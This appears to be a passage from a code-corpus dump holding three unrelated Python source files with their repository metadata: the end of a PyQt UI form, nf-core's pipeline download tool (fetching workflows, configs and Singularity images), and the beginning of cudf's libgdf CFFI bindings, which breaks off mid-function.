self.btn_delete.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.btn_delete.setObjectName("btn_delete")
self.horizontalLayout_2.addWidget(self.btn_delete)
self.horizontalLayout.addWidget(self.frame)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
self.lineEdit.setPlaceholderText(_translate("Form", "关键字"))
self.btn_delete.setText(_translate("Form", "删除"))
| 40.898551 | 104 | 0.692417 |
7f03459cf6973a6ea31c6e1c70a57d0d74a1c4d9 | 36,404 | py | Python | nf_core/download.py | krokicki/tools | 901334d94cbf2ffce0c2e6c20de4354a7fe59b09 | [
"MIT"
] | 142 | 2018-02-14T18:01:28.000Z | 2022-03-25T03:25:34.000Z | nf_core/download.py | krokicki/tools | 901334d94cbf2ffce0c2e6c20de4354a7fe59b09 | [
"MIT"
] | 1,267 | 2018-02-14T21:12:51.000Z | 2022-03-31T17:24:09.000Z | nf_core/download.py | krokicki/tools | 901334d94cbf2ffce0c2e6c20de4354a7fe59b09 | [
"MIT"
] | 127 | 2018-02-13T17:01:07.000Z | 2022-03-25T03:25:36.000Z | #!/usr/bin/env python
"""Downloads a nf-core pipeline to the local file system."""
from __future__ import print_function
from io import BytesIO
import logging
import hashlib
import os
import questionary
import re
import requests
import requests_cache
import shutil
import subprocess
import sys
import tarfile
import concurrent.futures
import rich
import rich.progress
from zipfile import ZipFile
import nf_core
import nf_core.list
import nf_core.utils
log = logging.getLogger(__name__)
stderr = rich.console.Console(
stderr=True, style="dim", highlight=False, force_terminal=nf_core.utils.rich_force_colors()
)
class DownloadProgress(rich.progress.Progress):
"""Custom Progress bar class, allowing us to have two progress
bars with different columns / layouts.
"""
def get_renderables(self):
for task in self.tasks:
if task.fields.get("progress_type") == "summary":
self.columns = (
"[magenta]{task.description}",
rich.progress.BarColumn(bar_width=None),
"[progress.percentage]{task.percentage:>3.0f}%",
"•",
"[green]{task.completed}/{task.total} completed",
)
if task.fields.get("progress_type") == "download":
self.columns = (
"[blue]{task.description}",
rich.progress.BarColumn(bar_width=None),
"[progress.percentage]{task.percentage:>3.1f}%",
"•",
rich.progress.DownloadColumn(),
"•",
rich.progress.TransferSpeedColumn(),
)
if task.fields.get("progress_type") == "singularity_pull":
self.columns = (
"[magenta]{task.description}",
"[blue]{task.fields[current_log]}",
rich.progress.BarColumn(bar_width=None),
)
yield self.make_tasks_table([task])
class DownloadWorkflow(object):
"""Downloads a nf-core workflow from GitHub to the local file system.
Can also download its Singularity container image if required.
Args:
pipeline (str): A nf-core pipeline name.
revision (str): The workflow revision to download, like `1.0`. Defaults to None.
singularity (bool): Flag, if the Singularity container should be downloaded as well. Defaults to False.
outdir (str): Path to the local download directory. Defaults to None.
"""
def __init__(
self,
pipeline=None,
revision=None,
outdir=None,
compress_type=None,
force=False,
container=None,
singularity_cache_only=False,
parallel_downloads=4,
):
self.pipeline = pipeline
self.revision = revision
self.outdir = outdir
self.output_filename = None
self.compress_type = compress_type
self.force = force
self.container = container
self.singularity_cache_only = singularity_cache_only
self.parallel_downloads = parallel_downloads
self.wf_revisions = {}
self.wf_branches = {}
self.wf_sha = None
self.wf_download_url = None
self.nf_config = dict()
self.containers = list()
# Fetch remote workflows
self.wfs = nf_core.list.Workflows()
self.wfs.get_remote_workflows()
def download_workflow(self):
"""Starts a nf-core workflow download."""
# Get workflow details
try:
self.prompt_pipeline_name()
self.pipeline, self.wf_revisions, self.wf_branches = nf_core.utils.get_repo_releases_branches(
self.pipeline, self.wfs
)
self.prompt_revision()
self.get_revision_hash()
self.prompt_container_download()
self.prompt_use_singularity_cachedir()
self.prompt_singularity_cachedir_only()
self.prompt_compression_type()
except AssertionError as e:
log.critical(e)
sys.exit(1)
summary_log = [f"Pipeline revision: '{self.revision}'", f"Pull containers: '{self.container}'"]
if self.container == "singularity" and os.environ.get("NXF_SINGULARITY_CACHEDIR") is not None:
summary_log.append(
"Using [blue]$NXF_SINGULARITY_CACHEDIR[/]': {}".format(os.environ["NXF_SINGULARITY_CACHEDIR"])
)
# Set an output filename now that we have the outdir
if self.compress_type is not None:
self.output_filename = f"{self.outdir}.{self.compress_type}"
summary_log.append(f"Output file: '{self.output_filename}'")
else:
summary_log.append(f"Output directory: '{self.outdir}'")
# Check that the outdir doesn't already exist
if os.path.exists(self.outdir):
if not self.force:
log.error(f"Output directory '{self.outdir}' already exists (use [red]--force[/] to overwrite)")
sys.exit(1)
log.warning(f"Deleting existing output directory: '{self.outdir}'")
shutil.rmtree(self.outdir)
# Check that compressed output file doesn't already exist
if self.output_filename and os.path.exists(self.output_filename):
if not self.force:
log.error(f"Output file '{self.output_filename}' already exists (use [red]--force[/] to overwrite)")
sys.exit(1)
log.warning(f"Deleting existing output file: '{self.output_filename}'")
os.remove(self.output_filename)
# Summary log
log.info("Saving '{}'\n {}".format(self.pipeline, "\n ".join(summary_log)))
# Download the pipeline files
log.info("Downloading workflow files from GitHub")
self.download_wf_files()
# Download the centralised configs
log.info("Downloading centralised configs from GitHub")
self.download_configs()
try:
self.wf_use_local_configs()
except FileNotFoundError as e:
log.error("Error editing pipeline config file to use local configs!")
log.critical(e)
sys.exit(1)
# Download the singularity images
if self.container == "singularity":
self.find_container_images()
try:
self.get_singularity_images()
except OSError as e:
log.critical(f"[red]{e}[/]")
sys.exit(1)
# Compress into an archive
if self.compress_type is not None:
log.info("Compressing download..")
self.compress_download()
def prompt_pipeline_name(self):
"""Prompt for the pipeline name if not set with a flag"""
if self.pipeline is None:
stderr.print("Specify the name of a nf-core pipeline or a GitHub repository name (user/repo).")
self.pipeline = nf_core.utils.prompt_remote_pipeline_name(self.wfs)
def prompt_revision(self):
"""Prompt for pipeline revision / branch"""
# Prompt user for revision tag if '--revision' was not set
if self.revision is None:
self.revision = nf_core.utils.prompt_pipeline_release_branch(self.wf_revisions, self.wf_branches)
def get_revision_hash(self):
"""Find specified revision / branch hash"""
# Branch
if self.revision in self.wf_branches.keys():
self.wf_sha = self.wf_branches[self.revision]
# Revision
else:
for r in self.wf_revisions:
if r["tag_name"] == self.revision:
self.wf_sha = r["tag_sha"]
break
# Can't find the revisions or branch - throw an error
else:
log.info(
"Available {} revisions: '{}'".format(
self.pipeline, "', '".join([r["tag_name"] for r in self.wf_revisions])
)
)
log.info("Available {} branches: '{}'".format(self.pipeline, "', '".join(self.wf_branches.keys())))
raise AssertionError(
"Not able to find revision / branch '{}' for {}".format(self.revision, self.pipeline)
)
# Set the outdir
if not self.outdir:
self.outdir = "{}-{}".format(self.pipeline.replace("/", "-").lower(), self.revision)
# Set the download URL and return
self.wf_download_url = "https://github.com/{}/archive/{}.zip".format(self.pipeline, self.wf_sha)
def prompt_container_download(self):
"""Prompt whether to download container images or not"""
if self.container is None:
stderr.print("\nIn addition to the pipeline code, this tool can download software containers.")
self.container = questionary.select(
"Download software container images:",
choices=["none", "singularity"],
style=nf_core.utils.nfcore_question_style,
).unsafe_ask()
def prompt_use_singularity_cachedir(self):
"""Prompt about using $NXF_SINGULARITY_CACHEDIR if not already set"""
if (
self.container == "singularity"
and os.environ.get("NXF_SINGULARITY_CACHEDIR") is None
and stderr.is_interactive # Use rich auto-detection of interactive shells
):
stderr.print(
"\nNextflow and nf-core can use an environment variable called [blue]$NXF_SINGULARITY_CACHEDIR[/] that is a path to a directory where remote Singularity images are stored. "
"This allows downloaded images to be cached in a central location."
)
if rich.prompt.Confirm.ask(
f"[blue bold]?[/] [bold]Define [blue not bold]$NXF_SINGULARITY_CACHEDIR[/] for a shared Singularity image download folder?[/]"
):
# Prompt user for a cache directory path
cachedir_path = None
while cachedir_path is None:
prompt_cachedir_path = questionary.path(
"Specify the path:", only_directories=True, style=nf_core.utils.nfcore_question_style
).unsafe_ask()
cachedir_path = os.path.abspath(os.path.expanduser(prompt_cachedir_path))
if prompt_cachedir_path == "":
log.error(f"Not using [blue]$NXF_SINGULARITY_CACHEDIR[/]")
cachedir_path = False
elif not os.path.isdir(cachedir_path):
log.error(f"'{cachedir_path}' is not a directory.")
cachedir_path = None
if cachedir_path:
os.environ["NXF_SINGULARITY_CACHEDIR"] = cachedir_path
# Ask if user wants this set in their .bashrc
bashrc_path = os.path.expanduser("~/.bashrc")
if not os.path.isfile(bashrc_path):
bashrc_path = os.path.expanduser("~/.bash_profile")
if not os.path.isfile(bashrc_path):
bashrc_path = False
if bashrc_path:
stderr.print(
f"\nSo that [blue]$NXF_SINGULARITY_CACHEDIR[/] is always defined, you can add it to your [blue not bold]~/{os.path.basename(bashrc_path)}[/] file ."
"This will then be autmoatically set every time you open a new terminal. We can add the following line to this file for you: \n"
f'[blue]export NXF_SINGULARITY_CACHEDIR="{cachedir_path}"[/]'
)
append_to_file = rich.prompt.Confirm.ask(
f"[blue bold]?[/] [bold]Add to [blue not bold]~/{os.path.basename(bashrc_path)}[/] ?[/]"
)
if append_to_file:
with open(os.path.expanduser(bashrc_path), "a") as f:
f.write(
"\n\n#######################################\n"
f"## Added by `nf-core download` v{nf_core.__version__} ##\n"
+ f'export NXF_SINGULARITY_CACHEDIR="{cachedir_path}"'
+ "\n#######################################\n"
)
log.info(f"Successfully wrote to [blue]{bashrc_path}[/]")
log.warning(
"You will need reload your terminal after the download completes for this to take effect."
)
def prompt_singularity_cachedir_only(self):
"""Ask if we should *only* use $NXF_SINGULARITY_CACHEDIR without copying into target"""
if (
self.singularity_cache_only is None
and self.container == "singularity"
and os.environ.get("NXF_SINGULARITY_CACHEDIR") is not None
):
stderr.print(
"\nIf you are working on the same system where you will run Nextflow, you can leave the downloaded images in the "
"[blue not bold]$NXF_SINGULARITY_CACHEDIR[/] folder, Nextflow will automatically find them. "
"However if you will transfer the downloaded files to a different system then they should be copied to the target folder."
)
self.singularity_cache_only = rich.prompt.Confirm.ask(
f"[blue bold]?[/] [bold]Copy singularity images from [blue not bold]$NXF_SINGULARITY_CACHEDIR[/] to the target folder?[/]"
)
# Sanity check, for when passed as a cli flag
if self.singularity_cache_only and self.container != "singularity":
raise AssertionError("Command has '--singularity-cache-only' set, but '--container' is not 'singularity'")
def prompt_compression_type(self):
"""Ask user if we should compress the downloaded files"""
if self.compress_type is None:
stderr.print(
"\nIf transferring the downloaded files to another system, it can be convenient to have everything compressed in a single file."
)
if self.container == "singularity":
stderr.print(
"[bold]This is [italic]not[/] recommended when downloading Singularity images, as it can take a long time and saves very little space."
)
self.compress_type = questionary.select(
"Choose compression type:",
choices=[
"none",
"tar.gz",
"tar.bz2",
"zip",
],
style=nf_core.utils.nfcore_question_style,
).unsafe_ask()
# Correct type for no-compression
if self.compress_type == "none":
self.compress_type = None
def download_wf_files(self):
"""Downloads workflow files from GitHub to the :attr:`self.outdir`."""
log.debug("Downloading {}".format(self.wf_download_url))
# Download GitHub zip file into memory and extract
url = requests.get(self.wf_download_url)
zipfile = ZipFile(BytesIO(url.content))
zipfile.extractall(self.outdir)
# Rename the internal directory name to be more friendly
gh_name = "{}-{}".format(self.pipeline, self.wf_sha).split("/")[-1]
os.rename(os.path.join(self.outdir, gh_name), os.path.join(self.outdir, "workflow"))
# Make downloaded files executable
for dirpath, subdirs, filelist in os.walk(os.path.join(self.outdir, "workflow")):
for fname in filelist:
os.chmod(os.path.join(dirpath, fname), 0o775)
def download_configs(self):
"""Downloads the centralised config profiles from nf-core/configs to :attr:`self.outdir`."""
configs_zip_url = "https://github.com/nf-core/configs/archive/master.zip"
configs_local_dir = "configs-master"
log.debug("Downloading {}".format(configs_zip_url))
# Download GitHub zip file into memory and extract
url = requests.get(configs_zip_url)
zipfile = ZipFile(BytesIO(url.content))
zipfile.extractall(self.outdir)
# Rename the internal directory name to be more friendly
os.rename(os.path.join(self.outdir, configs_local_dir), os.path.join(self.outdir, "configs"))
# Make downloaded files executable
for dirpath, subdirs, filelist in os.walk(os.path.join(self.outdir, "configs")):
for fname in filelist:
os.chmod(os.path.join(dirpath, fname), 0o775)
def wf_use_local_configs(self):
"""Edit the downloaded nextflow.config file to use the local config files"""
nfconfig_fn = os.path.join(self.outdir, "workflow", "nextflow.config")
find_str = "https://raw.githubusercontent.com/nf-core/configs/${params.custom_config_version}"
repl_str = "${projectDir}/../configs/"
log.debug("Editing 'params.custom_config_base' in '{}'".format(nfconfig_fn))
# Load the nextflow.config file into memory
with open(nfconfig_fn, "r") as nfconfig_fh:
nfconfig = nfconfig_fh.read()
# Replace the target string
log.debug(f"Replacing '{find_str}' with '{repl_str}'")
nfconfig = nfconfig.replace(find_str, repl_str)
# Append the singularity.cacheDir to the end if we need it
if self.container == "singularity" and not self.singularity_cache_only:
nfconfig += (
f"\n\n// Added by `nf-core download` v{nf_core.__version__} //\n"
+ 'singularity.cacheDir = "${projectDir}/../singularity-images/"'
+ "\n///////////////////////////////////////"
)
# Write the file out again
log.debug(f"Updating '{nfconfig_fn}'")
with open(nfconfig_fn, "w") as nfconfig_fh:
nfconfig_fh.write(nfconfig)
def find_container_images(self):
"""Find container image names for workflow.
Starts by using `nextflow config` to pull out any process.container
declarations. This works for DSL1.
Second, we look for DSL2 containers. These can't be found with
`nextflow config` at the time of writing, so we scrape the pipeline files.
"""
log.debug("Fetching container names for workflow")
containers_raw = []
# Use linting code to parse the pipeline nextflow config
self.nf_config = nf_core.utils.fetch_wf_config(os.path.join(self.outdir, "workflow"))
# Find any config variables that look like a container
for k, v in self.nf_config.items():
if k.startswith("process.") and k.endswith(".container"):
containers_raw.append(v.strip('"').strip("'"))
# Recursive search through any DSL2 module files for container spec lines.
for subdir, dirs, files in os.walk(os.path.join(self.outdir, "workflow", "modules")):
for file in files:
if file.endswith(".nf"):
with open(os.path.join(subdir, file), "r") as fh:
# Look for any lines with `container = "xxx"`
matches = []
for line in fh:
match = re.match(r"\s*container\s+[\"']([^\"']+)[\"']", line)
if match:
matches.append(match.group(1))
# If we have matches, save the first one that starts with http
for m in matches:
if m.startswith("http"):
containers_raw.append(m.strip('"').strip("'"))
break
# If we get here then we didn't call break - just save the first match
else:
if len(matches) > 0:
containers_raw.append(matches[0].strip('"').strip("'"))
# Remove duplicates and sort
containers_raw = sorted(list(set(containers_raw)))
# Strip any container names that have dynamic names - eg. {params.foo}
self.containers = []
for container in containers_raw:
if "{" in container and "}" in container:
log.error(
f"[red]Container name [green]'{container}'[/] has dynamic Nextflow logic in name - skipping![/]"
)
log.info("Please use a 'nextflow run' command to fetch this container. Ask on Slack if you need help.")
else:
self.containers.append(container)
log.info("Found {} container{}".format(len(self.containers), "s" if len(self.containers) > 1 else ""))
def get_singularity_images(self):
"""Loop through container names and download Singularity images"""
if len(self.containers) == 0:
log.info("No container names found in workflow")
else:
with DownloadProgress() as progress:
task = progress.add_task("all_containers", total=len(self.containers), progress_type="summary")
# Organise containers based on what we need to do with them
containers_exist = []
containers_cache = []
containers_download = []
containers_pull = []
for container in self.containers:
# Fetch the output and cached filenames for this container
out_path, cache_path = self.singularity_image_filenames(container)
# Check that the directories exist
out_path_dir = os.path.dirname(out_path)
if not os.path.isdir(out_path_dir):
log.debug(f"Output directory not found, creating: {out_path_dir}")
os.makedirs(out_path_dir)
if cache_path:
cache_path_dir = os.path.dirname(cache_path)
if not os.path.isdir(cache_path_dir):
log.debug(f"Cache directory not found, creating: {cache_path_dir}")
os.makedirs(cache_path_dir)
# We already have the target file in place, return
if os.path.exists(out_path):
containers_exist.append(container)
continue
# We have a copy of this in the NXF_SINGULARITY_CACHE dir
if cache_path and os.path.exists(cache_path):
containers_cache.append([container, out_path, cache_path])
continue
# Direct download within Python
if container.startswith("http"):
containers_download.append([container, out_path, cache_path])
continue
# Pull using singularity
containers_pull.append([container, out_path, cache_path])
# Exit if we need to pull images and Singularity is not installed
if len(containers_pull) > 0 and shutil.which("singularity") is None:
raise OSError("Singularity is needed to pull images, but it is not installed")
# Go through each method of fetching containers in order
for container in containers_exist:
progress.update(task, description="Image file exists")
progress.update(task, advance=1)
for container in containers_cache:
progress.update(task, description=f"Copying singularity images from cache")
self.singularity_copy_cache_image(*container)
progress.update(task, advance=1)
with concurrent.futures.ThreadPoolExecutor(max_workers=self.parallel_downloads) as pool:
progress.update(task, description="Downloading singularity images")
# Kick off concurrent downloads
future_downloads = [
pool.submit(self.singularity_download_image, *container, progress)
for container in containers_download
]
# Make ctrl-c work with multi-threading
self.kill_with_fire = False
try:
# Iterate over each threaded download, waiting for them to finish
for future in concurrent.futures.as_completed(future_downloads):
try:
future.result()
except Exception:
raise
else:
try:
progress.update(task, advance=1)
except Exception as e:
log.error(f"Error updating progress bar: {e}")
except KeyboardInterrupt:
# Cancel the future threads that haven't started yet
for future in future_downloads:
future.cancel()
# Set the variable that the threaded function looks for
# Will trigger an exception from each thread
self.kill_with_fire = True
# Re-raise exception on the main thread
raise
for container in containers_pull:
progress.update(task, description="Pulling singularity images")
try:
self.singularity_pull_image(*container, progress)
except RuntimeWarning as r:
# Raise exception if this is not possible
log.error("Not able to pull image. Service might be down or internet connection is dead.")
raise r
progress.update(task, advance=1)
def singularity_image_filenames(self, container):
"""Check Singularity cache for image, copy to destination folder if found.
Args:
container (str): A pipeline's container name. Can be direct download URL
or a Docker Hub repository ID.
Returns:
results (bool, str): Returns True if we have the image in the target location.
Returns a download path if not.
"""
# Generate file paths
# Based on simpleName() function in Nextflow code:
# https://github.com/nextflow-io/nextflow/blob/671ae6d85df44f906747c16f6d73208dbc402d49/modules/nextflow/src/main/groovy/nextflow/container/SingularityCache.groovy#L69-L94
out_name = container
# Strip URI prefix
out_name = re.sub(r"^.*:\/\/", "", out_name)
# Detect file extension
extension = ".img"
if ".sif:" in out_name:
extension = ".sif"
out_name = out_name.replace(".sif:", "-")
elif out_name.endswith(".sif"):
extension = ".sif"
out_name = out_name[:-4]
# Strip : and / characters
out_name = out_name.replace("/", "-").replace(":", "-")
# Add file extension
out_name = out_name + extension
# Full destination and cache paths
out_path = os.path.abspath(os.path.join(self.outdir, "singularity-images", out_name))
cache_path = None
if os.environ.get("NXF_SINGULARITY_CACHEDIR"):
cache_path = os.path.join(os.environ["NXF_SINGULARITY_CACHEDIR"], out_name)
# Use only the cache - set this as the main output path
if self.singularity_cache_only:
out_path = cache_path
cache_path = None
elif self.singularity_cache_only:
raise FileNotFoundError("'--singularity-cache' specified but no '$NXF_SINGULARITY_CACHEDIR' set!")
return (out_path, cache_path)
def singularity_copy_cache_image(self, container, out_path, cache_path):
"""Copy Singularity image from NXF_SINGULARITY_CACHEDIR to target folder."""
# Copy to destination folder if we have a cached version
if cache_path and os.path.exists(cache_path):
log.debug("Copying {} from cache: '{}'".format(container, os.path.basename(out_path)))
shutil.copyfile(cache_path, out_path)
def singularity_download_image(self, container, out_path, cache_path, progress):
"""Download a singularity image from the web.
Use native Python to download the file.
Args:
container (str): A pipeline's container name. Usually it is of similar format
to ``https://depot.galaxyproject.org/singularity/name:version``
out_path (str): The final target output path
cache_path (str, None): The NXF_SINGULARITY_CACHEDIR path if set, None if not
progress (Progress): Rich progress bar instance to add tasks to.
"""
log.debug(f"Downloading Singularity image: '{container}'")
# Set output path to save file to
output_path = cache_path or out_path
output_path_tmp = f"{output_path}.partial"
log.debug(f"Downloading to: '{output_path_tmp}'")
# Set up progress bar
nice_name = container.split("/")[-1][:50]
task = progress.add_task(nice_name, start=False, total=False, progress_type="download")
try:
# Delete temporary file if it already exists
if os.path.exists(output_path_tmp):
os.remove(output_path_tmp)
# Open file handle and download
with open(output_path_tmp, "wb") as fh:
# Disable caching as this breaks streamed downloads
with requests_cache.disabled():
r = requests.get(container, allow_redirects=True, stream=True, timeout=60 * 5)
filesize = r.headers.get("Content-length")
if filesize:
progress.update(task, total=int(filesize))
progress.start_task(task)
# Stream download
for data in r.iter_content(chunk_size=4096):
# Check that the user didn't hit ctrl-c
if self.kill_with_fire:
raise KeyboardInterrupt
progress.update(task, advance=len(data))
fh.write(data)
# Rename partial filename to final filename
os.rename(output_path_tmp, output_path)
output_path_tmp = None
# Copy cached download if we are using the cache
if cache_path:
log.debug("Copying {} from cache: '{}'".format(container, os.path.basename(out_path)))
progress.update(task, description="Copying from cache to target directory")
shutil.copyfile(cache_path, out_path)
progress.remove_task(task)
except:
# Kill the progress bars
for t in progress.task_ids:
progress.remove_task(t)
# Try to delete the incomplete download
log.debug(f"Deleting incompleted singularity image download:\n'{output_path_tmp}'")
if output_path_tmp and os.path.exists(output_path_tmp):
os.remove(output_path_tmp)
if output_path and os.path.exists(output_path):
os.remove(output_path)
# Re-raise the caught exception
raise
def singularity_pull_image(self, container, out_path, cache_path, progress):
"""Pull a singularity image using ``singularity pull``
Attempt to use a local installation of singularity to pull the image.
Args:
container (str): A pipeline's container name. Usually it is of similar format
to ``nfcore/name:version``.
Raises:
Various exceptions possible from `subprocess` execution of Singularity.
"""
output_path = cache_path or out_path
# Pull using singularity
address = "docker://{}".format(container.replace("docker://", ""))
singularity_command = ["singularity", "pull", "--name", output_path, address]
log.debug("Building singularity image: {}".format(address))
log.debug("Singularity command: {}".format(" ".join(singularity_command)))
# Progress bar to show that something is happening
task = progress.add_task(container, start=False, total=False, progress_type="singularity_pull", current_log="")
# Run the singularity pull command
proc = subprocess.Popen(
singularity_command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True,
bufsize=1,
)
for line in proc.stdout:
log.debug(line.strip())
progress.update(task, current_log=line.strip())
# Copy cached download if we are using the cache
if cache_path:
log.debug("Copying {} from cache: '{}'".format(container, os.path.basename(out_path)))
progress.update(task, current_log="Copying from cache to target directory")
shutil.copyfile(cache_path, out_path)
progress.remove_task(task)
def compress_download(self):
"""Take the downloaded files and make a compressed .tar.gz archive."""
log.debug("Creating archive: {}".format(self.output_filename))
# .tar.gz and .tar.bz2 files
if self.compress_type == "tar.gz" or self.compress_type == "tar.bz2":
ctype = self.compress_type.split(".")[1]
with tarfile.open(self.output_filename, "w:{}".format(ctype)) as tar:
tar.add(self.outdir, arcname=os.path.basename(self.outdir))
tar_flags = "xzf" if ctype == "gz" else "xjf"
log.info(f"Command to extract files: [bright_magenta]tar -{tar_flags} {self.output_filename}[/]")
# .zip files
if self.compress_type == "zip":
with ZipFile(self.output_filename, "w") as zipObj:
# Iterate over all the files in directory
for folderName, subfolders, filenames in os.walk(self.outdir):
for filename in filenames:
# create complete filepath of file in directory
filePath = os.path.join(folderName, filename)
# Add file to zip
zipObj.write(filePath)
log.info(f"Command to extract files: [bright_magenta]unzip {self.output_filename}[/]")
# Delete original files
log.debug(f"Deleting uncompressed files: '{self.outdir}'")
shutil.rmtree(self.outdir)
# Caclualte md5sum for output file
self.validate_md5(self.output_filename)
def validate_md5(self, fname, expected=None):
"""Calculates the md5sum for a file on the disk and validate with expected.
Args:
fname (str): Path to a local file.
expected (str): The expected md5sum.
Raises:
IOError, if the md5sum does not match the remote sum.
"""
log.debug("Validating image hash: {}".format(fname))
# Calculate the md5 for the file on disk
hash_md5 = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
file_hash = hash_md5.hexdigest()
if expected is None:
log.info("MD5 checksum for '{}': [blue]{}[/]".format(fname, file_hash))
else:
if file_hash == expected:
log.debug("md5 sum of image matches expected: {}".format(expected))
else:
raise IOError("{} md5 does not match remote: {} - {}".format(fname, expected, file_hash))
| 45.334994 | 189 | 0.573756 |
ad1e274774735a14b97dfd9c9f93922adba92d2f | 18,246 | py | Python | cudf/_gdf.py | Iroy30/cudf | c333f4191d8bc2dc00c1144df10e6d1f77610f8f | [
"Apache-2.0"
] | null | null | null | cudf/_gdf.py | Iroy30/cudf | c333f4191d8bc2dc00c1144df10e6d1f77610f8f | [
"Apache-2.0"
] | null | null | null | cudf/_gdf.py | Iroy30/cudf | c333f4191d8bc2dc00c1144df10e6d1f77610f8f | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2018, NVIDIA CORPORATION.
"""
This file provide binding to the libgdf library.
"""
import contextlib
import itertools
import numpy as np
import pandas as pd
import pyarrow as pa
from libgdf_cffi import ffi, libgdf
from librmm_cffi import librmm as rmm
from . import cudautils
from .utils import calc_chunk_size, mask_dtype, mask_bitsize
def unwrap_devary(devary):
ptrval = devary.device_ctypes_pointer.value
ptrval = ptrval or ffi.NULL # replace None with NULL
return ffi.cast('void*', ptrval)
def unwrap_mask(devary):
ptrval = devary.device_ctypes_pointer.value
ptrval = ptrval or ffi.NULL # replace None with NULL
return ffi.cast('gdf_valid_type*', ptrval), ptrval
def columnview_from_devary(devary, dtype=None):
return _columnview(size=devary.size, data=unwrap_devary(devary),
mask=ffi.NULL, dtype=dtype or devary.dtype,
null_count=0)
def _columnview(size, data, mask, dtype, null_count):
colview = ffi.new('gdf_column*')
if null_count is None:
libgdf.gdf_column_view(
colview,
data,
mask,
size,
np_to_gdf_dtype(dtype),
)
else:
libgdf.gdf_column_view_augmented(
colview,
data,
mask,
size,
np_to_gdf_dtype(dtype),
null_count,
)
return colview
def columnview(size, data, mask=None, dtype=None, null_count=None):
"""
Make a column view.
Parameters
----------
size : int
Data count.
data : Buffer
The data buffer.
mask : Buffer; optional
The mask buffer.
dtype : numpy.dtype; optional
The dtype of the data. Defaults to *data.dtype*.
"""
def unwrap(buffer):
if buffer is None:
return ffi.NULL
assert buffer.mem.is_c_contiguous(), "libGDF expects contiguous memory"
devary = buffer.to_gpu_array()
return unwrap_devary(devary)
if mask is not None:
assert null_count is not None
dtype = dtype or data.dtype
return _columnview(size=size, data=unwrap(data), mask=unwrap(mask),
dtype=dtype, null_count=null_count)
def apply_binaryop(binop, lhs, rhs, out):
"""Apply binary operator *binop* to operands *lhs* and *rhs*.
The result is stored to *out*.
Returns the number of null values.
"""
args = (lhs.cffi_view, rhs.cffi_view, out.cffi_view)
# apply binary operator
binop(*args)
# validity mask
if out.has_null_mask:
return apply_mask_and(lhs, rhs, out)
else:
return 0
def apply_unaryop(unaop, inp, out):
"""Apply unary operator *unaop* to *inp* and store to *out*.
"""
args = (inp.cffi_view, out.cffi_view)
# apply unary operator
unaop(*args)
def apply_mask_and(col, mask, out):
args = (col.cffi_view, mask.cffi_view, out.cffi_view)
libgdf.gdf_validity_and(*args)
nnz = count_nonzero_mask(out.mask.mem, size=len(out))
return len(out) - nnz
np_gdf_dict = {np.float64: libgdf.GDF_FLOAT64,
np.float32: libgdf.GDF_FLOAT32,
np.int64: libgdf.GDF_INT64,
np.int32: libgdf.GDF_INT32,
np.int16: libgdf.GDF_INT16,
np.int8: libgdf.GDF_INT8,
np.bool_: libgdf.GDF_INT8,
np.datetime64: libgdf.GDF_DATE64}
def np_to_gdf_dtype(dtype):
"""Util to convert numpy dtype to gdf dtype.
"""
if pd.api.types.is_categorical_dtype(dtype):
return libgdf.GDF_INT8
else:
return np_gdf_dict[np.dtype(dtype).type]
def gdf_to_np_dtype(dtype):
"""Util to convert gdf dtype to numpy dtype.
"""
return np.dtype({
libgdf.GDF_FLOAT64: np.float64,
libgdf.GDF_FLOAT32: np.float32,
libgdf.GDF_INT64: np.int64,
libgdf.GDF_INT32: np.int32,
libgdf.GDF_INT16: np.int16,
libgdf.GDF_INT8: np.int8,
libgdf.GDF_DATE64: np.datetime64,
libgdf.N_GDF_TYPES: np.int32,
libgdf.GDF_CATEGORY: np.int32,
}[dtype])
def np_to_pa_dtype(dtype):
"""Util to convert numpy dtype to PyArrow dtype.
"""
return {
np.float64: pa.float64(),
np.float32: pa.float32(),
np.int64: pa.int64(),
np.int32: pa.int32(),
np.int16: pa.int16(),
np.int8: pa.int8(),
np.bool_: pa.int8(),
np.datetime64: pa.date64(),
}[np.dtype(dtype).type]
def apply_reduce(fn, inp):
# allocate output+temp array
outsz = libgdf.gdf_reduce_optimal_output_size()
out = rmm.device_array(outsz, dtype=inp.dtype)
# call reduction
fn(inp.cffi_view, unwrap_devary(out), outsz)
# return 1st element
return out[0]
def apply_sort(col_keys, col_vals, ascending=True):
"""Inplace sort
"""
nelem = len(col_keys)
begin_bit = 0
end_bit = col_keys.dtype.itemsize * 8
plan = libgdf.gdf_radixsort_plan(nelem, not ascending, begin_bit, end_bit)
sizeof_key = col_keys.dtype.itemsize
sizeof_val = col_vals.dtype.itemsize
try:
libgdf.gdf_radixsort_plan_setup(plan, sizeof_key, sizeof_val)
libgdf.gdf_radixsort_generic(plan,
col_keys.cffi_view,
col_vals.cffi_view)
finally:
libgdf.gdf_radixsort_plan_free(plan)
_join_how_api = {
'inner': libgdf.gdf_inner_join,
'outer': libgdf.gdf_full_join,
'left': libgdf.gdf_left_join,
}
_join_method_api = {
'sort': libgdf.GDF_SORT,
'hash': libgdf.GDF_HASH
}
def cffi_view_to_column_mem(cffi_view):
intaddr = int(ffi.cast("uintptr_t", cffi_view.data))
data = rmm.device_array_from_ptr(intaddr,
nelem=cffi_view.size,
dtype=gdf_to_np_dtype(cffi_view.dtype),
finalizer=rmm._make_finalizer(intaddr, 0))
if cffi_view.valid:
intaddr = int(ffi.cast("uintptr_t", cffi_view.valid))
mask = rmm.device_array_from_ptr(intaddr,
nelem=calc_chunk_size(cffi_view.size,
mask_bitsize),
dtype=mask_dtype,
finalizer=rmm._make_finalizer(intaddr,
0))
else:
mask = None
return data, mask
@contextlib.contextmanager
def apply_join(col_lhs, col_rhs, how, method='hash'):
"""Returns a tuple of the left and right joined indices as gpu arrays.
"""
if(len(col_lhs) != len(col_rhs)):
msg = "Unequal #columns in list 'col_lhs' and list 'col_rhs'"
raise ValueError(msg)
joiner = _join_how_api[how]
method_api = _join_method_api[method]
gdf_context = ffi.new('gdf_context*')
if method == 'hash':
libgdf.gdf_context_view(gdf_context, 0, method_api, 0, 0, 0)
elif method == 'sort':
